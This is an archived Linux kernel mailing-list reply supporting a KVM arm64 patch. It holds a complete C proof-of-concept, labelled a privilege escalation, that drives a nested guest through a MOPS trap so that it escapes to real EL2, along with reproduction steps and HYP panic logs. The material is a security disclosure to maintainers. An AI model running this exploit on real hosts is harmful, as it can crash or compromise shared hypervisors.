Linux-ARM-Kernel Archive on lore.kernel.org
 help / color / mirror / Atom feed
From: Weiming Shi <bestswngs@gmail.com>
To: Marc Zyngier <maz@kernel.org>, Oliver Upton <oupton@kernel.org>,
	 Catalin Marinas <catalin.marinas@arm.com>,
	Will Deacon <will@kernel.org>
Cc: Joey Gouly <joey.gouly@arm.com>,
	Steffen Eiden <seiden@linux.ibm.com>,
	 Suzuki K Poulose <suzuki.poulose@arm.com>,
	Zenghui Yu <yuzenghui@huawei.com>,
	 Andrew Morton <akpm@linux-foundation.org>,
	Jakub Kicinski <kuba@kernel.org>,
	 Bjorn Andersson <andersson@kernel.org>,
	Mark Rutland <mark.rutland@arm.com>,
	 Kristina Martsenko <kristina.martsenko@arm.com>,
	linux-arm-kernel@lists.infradead.org, kvmarm@lists.linux.dev,
	 Zhong Wang <wangzhong.c0ss4ck@bytedance.com>,
	Xuanqing Shi <shixuanqing.11@bytedance.com>
Subject: Re: [PATCH] KVM: arm64: nv: Translate vEL2 PSTATE to EL1 in kvm_hyp_handle_mops()
Date: Tue, 16 Jun 2026 20:03:55 +0800	[thread overview]
Message-ID: <ajE4lHQevXNHpl1M@Air.local> (raw)
In-Reply-To: <20260616114943.81188-2-bestswngs@gmail.com>



Reproduction Steps:

1. prepare arm64 kernel image

```
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- defconfig
./scripts/config -e VIRTUALIZATION -e KVM
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- olddefconfig
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- -j$(nproc) Image
make ARCH=arm64 headers_install INSTALL_HDR_PATH=/tmp/khdr
```
2. prepare qemu + initramfs

3. boot qemu with the kernel image

```
qemu-system-aarch64 \
    -machine virt,virtualization=on,gic-version=3 -cpu max -accel tcg \
    -smp 2 -m 2G -kernel arch/arm64/boot/Image -initrd initramfs.cpio.gz \
    -append "console=ttyAMA0 kvm-arm.mode=nested rdinit=/init panic=-1 oops=panic" \
    -nographic -no-reboot
```

PoC:

```
/*
* PoC: kvm_hyp_handle_mops SPSR_EL2 privilege escalation (EL1 -> EL2)
*
* Demonstrates that kvm_hyp_handle_mops writes un-translated PSR_MODE_EL2h
* into hardware SPSR_EL2 on the fast-reentry path, allowing a nested guest
* to escape to real EL2 after an EC_MOPS trap.
*
* Build:  aarch64-linux-gnu-gcc -static -O0 -o poc_mops poc_mops_clean.c
* Run:    sudo ./poc_mops
*
* Expected result on vulnerable kernel: HYP panic with PS:00000009 (EL2h)
*/


#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <errno.h>
#include <linux/kvm.h>


#define KVM_ARM_VCPU_HAS_EL2  7


#define PSR_MODE_EL1h  0x00000005
#define PSR_MODE_EL2h  0x00000009


#define ARM64_CORE_REG(u32_off) (0x6030000000100000ULL | (uint64_t)(u32_off))
#define REG_X(n)    ARM64_CORE_REG((n) * 2)
#define REG_SP      ARM64_CORE_REG(62)
#define REG_PC      ARM64_CORE_REG(64)
#define REG_PSTATE  ARM64_CORE_REG(66)


#define GUEST_MEM_SIZE   (64 * 1024 * 1024)
#define GUEST_CODE_ADDR  0x40000000ULL
#define GUEST_STACK_TOP  (GUEST_CODE_ADDR + GUEST_MEM_SIZE - 0x1000)
#define MMIO_ADDR        0x10000000ULL


/*
* Write a single 64-bit register value through KVM_SET_ONE_REG.
*
* fd  - file descriptor the ioctl is issued on
* id  - KVM register identifier
* val - value to store; passed to the kernel by address
*
* Returns whatever ioctl() returns (negative on failure).
*/
static int kvm_set_one_reg(int fd, uint64_t id, uint64_t val)
{
   struct kvm_one_reg reg;

   reg.id = id;
   /* The kernel ABI carries the userspace pointer as a 64-bit integer. */
   reg.addr = (uint64_t)(uintptr_t)&val;

   return ioctl(fd, KVM_SET_ONE_REG, &reg);
}


/*
* Read a single 64-bit register value through KVM_GET_ONE_REG.
*
* fd  - file descriptor the ioctl is issued on
* id  - KVM register identifier
* val - destination buffer whose address is handed to the kernel
*
* Returns whatever ioctl() returns (negative on failure).
*/
static int kvm_get_one_reg(int fd, uint64_t id, uint64_t *val)
{
   struct kvm_one_reg reg;

   reg.id = id;
   /* The kernel ABI carries the userspace pointer as a 64-bit integer. */
   reg.addr = (uint64_t)(uintptr_t)val;

   return ioctl(fd, KVM_GET_ONE_REG, &reg);
}


/* Report msg together with the current errno text, then exit with status 1. */
static void die(const char *msg)
{
   perror(msg);
   exit(1);
}


/*
* Guest code (runs at virtual EL2h).
*
* Triggers EC_MOPS by executing CPYP (prologue, large size so it doesn't
* complete in prologue phase) followed immediately by CPYE (epilogue).
* The CPU detects PSTATE.MOPS_STATE mismatch and traps.
*
* kvm_hyp_handle_mops resets PC -= 8 (for epilogue) and writes vcpu_cpsr
* (which contains EL2h after fixup_guest_exit reverse translation) directly
* to HW SPSR_EL2 without forward translation. On eret, the CPU enters
* real EL2h at the guest PC, causing an instruction abort (no EL2 mapping
* for guest addresses) -> HYP panic.
*
* Layout (offsets from GUEST_CODE_ADDR):
*   +0x00  setup x0,x1,x2,x3
*   +0x10  movz x9, #0
*   +0x14  mrs x10, CurrentEL         ; record EL before
*   +0x18  str x10, [x3]              ; MMIO exit #1
*   +0x1C  b +16                      ; jump to cpyp at +0x2C
*   +0x20  nop
*   +0x24  nop
*   +0x28  mrs x11, CurrentEL         ; <-- RESET LANDS HERE (0x30-8)
*   +0x2C  cpyp [x0]!, [x1]!, x2!
*   +0x30  cpye [x0]!, [x1]!, x2!    ; EC_MOPS trap
*   +0x34  str x11, [x3]              ; MMIO exit #2 (x11 is written only at +0x28)
*   +0x38  b .                        ; done
*
* The branch at +0x1C skips +0x20..+0x28 on the first pass, so the
* "mrs x11" at +0x28 executes only if the PC is rewound to 0x30 - 8.
*
* Each array element is one 32-bit instruction word. main() copies the
* array to the start of guest memory, whose guest physical base is
* GUEST_CODE_ADDR.
*/
static const uint32_t guest_code[] = {
   0xd2a80200,  /* +0x00  movz x0, #0x4010, lsl #16  (dest = 0x40100000) */
   0xd2a80401,  /* +0x04  movz x1, #0x4020, lsl #16  (src  = 0x40200000) */
   0xd2a00202,  /* +0x08  movz x2, #0x10, lsl #16    (size = 1MB) */
   0xd2a20003,  /* +0x0C  movz x3, #0x1000, lsl #16  (MMIO = 0x10000000, i.e. MMIO_ADDR) */
   0xd2800009,  /* +0x10  movz x9, #0 */
   0xd538424a,  /* +0x14  mrs x10, CurrentEL (EL before the MOPS trap) */
   0xf900006a,  /* +0x18  str x10, [x3] -> MMIO exit #1 */
   0x14000004,  /* +0x1C  b +16 -> +0x2C (skips +0x20..+0x28) */
   0xd503201f,  /* +0x20  nop */
   0xd503201f,  /* +0x24  nop */
   0xd538424b,  /* +0x28  mrs x11, CurrentEL (AFTER eret; reached only via PC reset) */
   0x1d010440,  /* +0x2C  cpyp [x0]!, [x1]!, x2! */
   0x1d810440,  /* +0x30  cpye [x0]!, [x1]!, x2! -> EC_MOPS */
   0xf900006b,  /* +0x34  str x11, [x3] -> MMIO exit #2 */
   0x14000000,  /* +0x38  b . */
};


/*
 * Entry point of the PoC.
 *
 * Creates a VM with one vCPU that has the HAS_EL2 feature, backs guest
 * physical memory at GUEST_CODE_ADDR with an anonymous mapping, copies
 * guest_code into it, sets up a GICv3, and runs the vCPU for at most 100
 * KVM_RUN iterations. Every MMIO write to MMIO_ADDR carries a CurrentEL
 * value sampled by the guest; the first and second samples are compared.
 *
 * Returns 0 after the run loop (whatever its outcome) and 1 when the vCPU
 * cannot be initialised with HAS_EL2. Setup failures that make the run
 * meaningless terminate the process through die().
 */
int main(void)
{
   int kvm_fd, vm_fd, vcpu_fd, ret, run_size;
   struct kvm_vcpu_init vcpu_init = {0};
   struct kvm_run *run;
   void *guest_mem;
   const char *start_mode = "EL2h";
   int mmio_count = 0;
   uint64_t el_before = 0, el_after = 0;


   setbuf(stdout, NULL);
   setbuf(stderr, NULL);


   printf("[*] kvm_hyp_handle_mops SPSR privilege escalation PoC\n");
   printf("[*] Target: Linux kernel with CONFIG_KVM_ARM_NV + FEAT_MOPS\n\n");


   kvm_fd = open("/dev/kvm", O_RDWR);
   if (kvm_fd < 0) die("open /dev/kvm");


   vm_fd = ioctl(kvm_fd, KVM_CREATE_VM, 0);
   if (vm_fd < 0) die("KVM_CREATE_VM");


   /* Guest memory */
   guest_mem = mmap(NULL, GUEST_MEM_SIZE, PROT_READ | PROT_WRITE,
                    MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
   if (guest_mem == MAP_FAILED) die("mmap");


   struct kvm_userspace_memory_region region = {
       .slot = 0,
       .guest_phys_addr = GUEST_CODE_ADDR,
       .memory_size = GUEST_MEM_SIZE,
       .userspace_addr = (uint64_t)(uintptr_t)guest_mem,
   };
   if (ioctl(vm_fd, KVM_SET_USER_MEMORY_REGION, &region) < 0)
       die("KVM_SET_USER_MEMORY_REGION");


   /* The guest starts executing at the base of the memory slot. */
   memcpy(guest_mem, guest_code, sizeof(guest_code));


   /* Create vCPU with nested virtualization */
   vcpu_fd = ioctl(vm_fd, KVM_CREATE_VCPU, 0);
   if (vcpu_fd < 0) die("KVM_CREATE_VCPU");


   if (ioctl(vm_fd, KVM_ARM_PREFERRED_TARGET, &vcpu_init) < 0)
       die("KVM_ARM_PREFERRED_TARGET");


   vcpu_init.features[0] |= (1U << KVM_ARM_VCPU_HAS_EL2);
   if (ioctl(vcpu_fd, KVM_ARM_VCPU_INIT, &vcpu_init) < 0) {
       perror("KVM_ARM_VCPU_INIT with HAS_EL2");
       printf("[-] Nested virtualization not supported.\n");
       return 1;
   }
   printf("[+] vCPU created with nested virt (NV)\n");


   /* GICv3 (required before KVM_RUN) */
   {
       struct kvm_create_device gic_dev = { .type = KVM_DEV_TYPE_ARM_VGIC_V3 };
       int gic_ok = 1;

       if (ioctl(vm_fd, KVM_CREATE_DEVICE, &gic_dev) < 0)
           die("KVM_CREATE_DEVICE GICv3");


       uint64_t dist = 0x08000000ULL, redist = 0x080A0000ULL;
       struct kvm_device_attr attr = {
           .group = KVM_DEV_ARM_VGIC_GRP_ADDR,
           .attr = KVM_VGIC_V3_ADDR_TYPE_DIST,
           .addr = (uint64_t)(uintptr_t)&dist,
       };

       /*
        * Attribute failures are reported but not fatal: the run is still
        * attempted, matching the original best-effort behaviour.
        */
       if (ioctl(gic_dev.fd, KVM_SET_DEVICE_ATTR, &attr) < 0) {
           perror("KVM_SET_DEVICE_ATTR GICv3 DIST");
           gic_ok = 0;
       }
       attr.attr = KVM_VGIC_V3_ADDR_TYPE_REDIST;
       attr.addr = (uint64_t)(uintptr_t)&redist;
       if (ioctl(gic_dev.fd, KVM_SET_DEVICE_ATTR, &attr) < 0) {
           perror("KVM_SET_DEVICE_ATTR GICv3 REDIST");
           gic_ok = 0;
       }


       attr = (struct kvm_device_attr){
           .group = KVM_DEV_ARM_VGIC_GRP_CTRL,
           .attr = KVM_DEV_ARM_VGIC_CTRL_INIT,
       };
       if (ioctl(gic_dev.fd, KVM_SET_DEVICE_ATTR, &attr) < 0) {
           perror("KVM_SET_DEVICE_ATTR GICv3 CTRL_INIT");
           gic_ok = 0;
       }
       if (gic_ok)
           printf("[+] GICv3 initialized\n");
   }


   /* Set vCPU state: start at virtual EL2h */
   if (kvm_set_one_reg(vcpu_fd, REG_PC, GUEST_CODE_ADDR) < 0)
       die("KVM_SET_ONE_REG PC");
   if (kvm_set_one_reg(vcpu_fd, REG_SP, GUEST_STACK_TOP) < 0)
       die("KVM_SET_ONE_REG SP");
   if (kvm_set_one_reg(vcpu_fd, REG_PSTATE, PSR_MODE_EL2h) < 0) {
       printf("[!] Cannot set EL2h, falling back to EL1h\n");
       if (kvm_set_one_reg(vcpu_fd, REG_PSTATE, PSR_MODE_EL1h) < 0)
           die("KVM_SET_ONE_REG PSTATE");
       start_mode = "EL1h";
   }
   /* Report the mode that was actually programmed, not the intended one. */
   printf("[+] vCPU: PC=0x%llx PSTATE=%s SP=0x%llx\n",
          (unsigned long long)GUEST_CODE_ADDR,
          start_mode,
          (unsigned long long)GUEST_STACK_TOP);


   /* Map kvm_run */
   run_size = ioctl(kvm_fd, KVM_GET_VCPU_MMAP_SIZE, 0);
   if (run_size < 0) die("KVM_GET_VCPU_MMAP_SIZE");
   run = mmap(NULL, (size_t)run_size, PROT_READ | PROT_WRITE, MAP_SHARED,
              vcpu_fd, 0);
   if (run == MAP_FAILED) die("mmap vcpu");


   /* Execute guest */
   printf("\n[*] Running guest. If kernel panics -> vulnerability confirmed.\n\n");


   for (int i = 0; i < 100; i++) {
       ret = ioctl(vcpu_fd, KVM_RUN, 0);
       if (ret < 0) {
           printf("[-] KVM_RUN failed: %s (errno=%d)\n", strerror(errno), errno);
           break;
       }


       switch (run->exit_reason) {
       case KVM_EXIT_MMIO:
           if (run->mmio.is_write && run->mmio.phys_addr == MMIO_ADDR) {
               uint64_t val = 0;
               size_t len = run->mmio.len;
               uint64_t el;

               /* Never copy more than the destination can hold. */
               if (len > sizeof(val))
                   len = sizeof(val);
               memcpy(&val, run->mmio.data, len);

               /* The exception level is taken from bits [3:2] of the value. */
               el = (val >> 2) & 3;
               mmio_count++;
               printf("[+] MMIO #%d: CurrentEL = 0x%llx (EL%lld)\n",
                      mmio_count, (unsigned long long)val, (long long)el);
               if (mmio_count == 1) el_before = el;
               if (mmio_count == 2) { el_after = el; goto results; }
           }
           break;


       case KVM_EXIT_INTERNAL_ERROR:
           printf("[!] INTERNAL_ERROR: safety assert may have caught EL2h SPSR\n");
           goto done;


       case KVM_EXIT_FAIL_ENTRY:
           printf("[-] FAIL_ENTRY: 0x%llx\n",
                  (unsigned long long)run->fail_entry.hardware_entry_failure_reason);
           goto done;


       default:
           printf("[*] exit_reason=%u (iter %d)\n",
                  (unsigned int)run->exit_reason, i);
           break;
       }
   }
   printf("[-] Max iterations reached without result.\n");
   goto done;


results:
   printf("\n========== RESULTS ==========\n");
   printf("  EL before MOPS: EL%lld\n", (long long)el_before);
   printf("  EL after  MOPS: EL%lld\n", (long long)el_after);
   printf("=============================\n\n");


   if (el_after > el_before)
       printf("[!!!] PRIVILEGE ESCALATION: EL%lld -> EL%lld\n",
              (long long)el_before, (long long)el_after);
   else
       printf("[+] No escalation observed in guest registers.\n");


done:
   printf("\n[*] Check dmesg for HYP panic:\n");
   printf("    dmesg | grep -i 'hyp panic\\|PS:.*0009'\n");
   printf("[*] If PS:00000009 appears -> SPSR contained EL2h -> vuln confirmed.\n");


   close(vcpu_fd);
   close(vm_fd);
   close(kvm_fd);
   munmap(guest_mem, GUEST_MEM_SIZE);
   munmap(run, (size_t)run_size);
   return 0;
}

```

crash log

```
========== FatalMOPS dynamic test (L1 host) ==========
  [*] CPU ID registers (FEAT_MOPS bits[19:16] of isar2; FEAT_NV bits[27:24] of mmfr2):
      /sys/devices/system/cpu/cpu0/regs/identification/id_aa64isar2_el1: (absent)
      /sys/devices/system/cpu/cpu0/regs/identification/id_aa64mmfr2_el1: (absent)
  [+] /dev/kvm present
  [*] dmesg nested-virt lines:
  [*] launching /poc ...
  [*] FatalMOPS PoC: kvm_hyp_handle_mops vEL2->EL2 escape
  [+] vCPU created with nested virt (HAS_EL2)
  [+] GICv3 initialized
  [+] vCPU starts at virtual EL2h
  [*] Running guest. Vulnerable kernel -> HYP panic expected.
  [+] MMIO #1: CurrentEL=EL2
  [    3.326956] Kernel panic - not syncing: HYP panic:
  [    3.326956] PS:00000009 PC:0000000040000028 ESR:86000005
  [    3.326956] FAR:0000000040000028 HPFAR:0000000000402000 PAR:1de7ec7edbadc0de
  [    3.326956] VCPU:000000006f4e5727
  [    3.342728] CPU: 0 UID: 0 PID: 59 Comm: poc Not tainted 7.1.0-rc7-00217-gfbc6a80cb5d3 #1 PREEMPT
  [    3.349460] Hardware name: linux,dummy-virt (DT)
  [    3.353136] Call trace:
  [    3.355241]  show_stack+0x18/0x24 (C)
  [    3.358652]  dump_stack_lvl+0x34/0x8c
  [    3.361515]  dump_stack+0x18/0x24
  [    3.364085]  vpanic+0x47c/0x4dc
  [    3.366527]  do_panic_on_target_cpu+0x0/0x1c
  [    3.369782]  kvm_unexpected_el2_exception+0x0/0x3c0
  [    3.373494]  hyp_panic+0x0/0x80
  [    3.375940]  kvm_arm_vcpu_enter_exit+0x64/0x94
  [    3.379372]  kvm_arch_vcpu_ioctl_run+0x27c/0x8f8
  [    3.382919]  kvm_vcpu_ioctl+0x174/0xa38
  [    3.385894]  __arm64_sys_ioctl+0xac/0x104
  [    3.389105]  invoke_syscall+0x54/0x10c
  [    3.392015]  el0_svc_common.constprop.0+0x40/0xe0
  [    3.395653]  do_el0_svc+0x1c/0x28
  [    3.398236]  el0_svc+0x38/0x11c
  [    3.400681]  el0t_64_sync_handler+0xa0/0xe4
  [    3.403872]  el0t_64_sync+0x198/0x19c
  [    3.407083] SMP: stopping secondary CPUs
  [    3.410661] Kernel Offset: 0x127592c00000 from 0xffff800080000000
  [    3.415585] PHYS_OFFSET: 0x40000000
  [    3.418668] CPU features: 0x00000000,0034e00b,ffeec7e1,9d7e7f3f
  [    3.423170] Memory Limit: none
```

crash log after symbol decoding

```
  Kernel panic - not syncing: HYP panic:
  PS:00000009 PC:0000000040000028 ESR:86000005
  FAR:0000000040000028 HPFAR:0000000000402000 PAR:1de7ec7edbadc0de
  VCPU:000000006f4e5727
  CPU: 0 UID: 0 PID: 59 Comm: poc Not tainted 7.1.0-rc7-00217-gfbc6a80cb5d3 #1 PREEMPT
  Call trace:
   show_stack                   (arch/arm64/kernel/stacktrace.c:499)
   dump_stack_lvl               (lib/dump_stack.c:94 120)
   dump_stack                   (lib/dump_stack.c:129)
   vpanic                       (kernel/panic.c:650)
   do_panic_on_target_cpu       (kernel/panic.c:341)
   kvm_unexpected_el2_exception (arch/arm64/kvm/hyp/include/hyp/switch.h:964
                                 → arch/arm64/kvm/hyp/vhe/switch.c:688)
   hyp_panic                    (arch/arm64/kvm/hyp/vhe/switch.c:678)
   kvm_arm_vcpu_enter_exit      (arch/arm64/kvm/arm.c:1227)
   kvm_arch_vcpu_ioctl_run      (arch/arm64/kvm/arm.c:1324)
   kvm_vcpu_ioctl               (virt/kvm/kvm_main.c:4470)
   __arm64_sys_ioctl            (fs/ioctl.c:51 597 583)
   invoke_syscall               (arch/arm64/kernel/syscall.c:35 49)
   el0_svc_common.constprop.0   (arch/arm64/kernel/syscall.c:121)
   do_el0_svc                   (arch/arm64/kernel/syscall.c:140)
   el0_svc                      (arch/arm64/kernel/entry-common.c:740)
   el0t_64_sync_handler         (arch/arm64/kernel/entry-common.c:759)
   el0t_64_sync                 (arch/arm64/kernel/entry.S:594)
```




      reply	other threads:[~2026-06-16 12:04 UTC|newest]

Thread overview: 2+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2026-06-16 11:49 [PATCH] KVM: arm64: nv: Translate vEL2 PSTATE to EL1 in kvm_hyp_handle_mops() Weiming Shi
2026-06-16 12:03 ` Weiming Shi [this message]

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=ajE4lHQevXNHpl1M@Air.local \
    --to=bestswngs@gmail.com \
    --cc=akpm@linux-foundation.org \
    --cc=andersson@kernel.org \
    --cc=catalin.marinas@arm.com \
    --cc=joey.gouly@arm.com \
    --cc=kristina.martsenko@arm.com \
    --cc=kuba@kernel.org \
    --cc=kvmarm@lists.linux.dev \
    --cc=linux-arm-kernel@lists.infradead.org \
    --cc=mark.rutland@arm.com \
    --cc=maz@kernel.org \
    --cc=oupton@kernel.org \
    --cc=seiden@linux.ibm.com \
    --cc=shixuanqing.11@bytedance.com \
    --cc=suzuki.poulose@arm.com \
    --cc=wangzhong.c0ss4ck@bytedance.com \
    --cc=will@kernel.org \
    --cc=yuzenghui@huawei.com \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox